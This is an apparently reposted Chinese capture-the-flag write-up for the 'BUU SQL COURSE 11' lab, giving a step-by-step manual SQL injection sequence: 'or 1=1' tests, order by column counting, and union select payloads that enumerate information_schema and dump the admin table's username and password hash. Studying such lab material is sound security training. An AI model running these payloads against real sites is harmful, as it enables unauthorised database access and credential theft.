首页 > 编程入门 文章详情

BUU SQL COURSE 11

编程入门 行业动态 更新时间:2024-10-07 10:22:35

<a href=https://www.elefans.com/category/jswz/34/1767650.html style=BUU SQL COURSE 11"/>

BUU SQL COURSE 11

打开之后 F12查看

:81/backend/content_detail.php?id=1

找到注入点

sql手工注入流程

1、判断注入类型 ?id=1 or 1=1  ?id=1' or '1'='1

2、判断列数:?id=1 order by 1,2,3

3、判断注入点:?id=-1 union select 1 ?id=-1 union select 1,2,3

4、查看数据库:?id=-1 union select 1,database()

5、查看表名:?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'

6、查看列名:  ?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

7、查看字段:?id=-1 union select 1,group_concat(username) from admin

        ?id=-1 union select 1,group_concat(password) from admin

账号 admin 密码 62ca075a51d47c2b4d187c1088186532

更多推荐

BUU SQL COURSE 11

本文发布于:2024-02-14 09:30:02,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1762697.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:BUU   SQL

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表